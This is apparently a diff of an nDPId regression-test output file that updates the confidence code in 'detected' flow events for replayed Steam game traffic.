00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1357332165187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165187,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARZ6rAqLyV0G+FVbJhaYkALIgdVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1357332165187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165187,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxrAqLyVSKU9sLJhaYoALFeMVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1357332165188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165188,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxHAqLyVSKU9ubJhaYkALFeEVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.35","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1357332165188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165188,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARHb7AqLyVRI5bI7JhaYkALD4xVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.35","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.35","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1357332165226,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165226,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTwAAIAR3dVIpT2wwKi8lWmKsmEANKPuVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAASRKpercAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1357332165229,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165229,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWT0AAIAR3ctIpT25wKi8lWmJsmEANNMtVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAPeyXWaUAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1357332165230,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165230,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWT4AAIAROdeSQpgPwKi8lWmKsmEANLvcVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAACGWHPF4BAAA="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165237,"flow_last_seen":1357332165237,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165237,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1357332165237,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165237,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx\/AqLyVkkKYDbJhaYsALLOQVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165237,"flow_last_seen":1357332165237,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165237,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165237,"flow_last_seen":1357332165237,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165237,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1357332165238,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165238,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qjAqLyVRRyRqrJhaYoALAcbVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1357332165238,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165238,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx3AqLyVkkKYD7JhaYkALLOQVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1357332165238,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165238,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxvAqLyVSKU9r7JhaYoALFeNVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1357332165243,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165243,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWT8AAIARDmTQb4VUwKi8lWmJsmEANLI1VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAPGE+dlEBAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1357332165266,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165266,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUAAAIARjWBFHJGqwKi8lWmKsmEANA+cVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA1CBaTb8AAAA="} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1357332165270,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165270,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUEAAIAROdSSQpgPwKi8lWmLsmEANCWgVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAfF+2fVEBAAA="} 
@@ -177,28 +177,28 @@ 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1357332165285,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165285,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUQAAIARxHFEjlsjwKi8lWmJsmEANM4fVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAQP0jAwIBAAA="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165287,"flow_last_seen":1357332165287,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165287,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1357332165287,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165287,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LzAqLyVUatzB7JhaYsALBkuVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165287,"flow_last_seen":1357332165287,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165287,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165287,"flow_last_seen":1357332165287,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165287,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1357332165288,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165288,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNw7AqLyVSKU9vLJhaYoALFeAVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
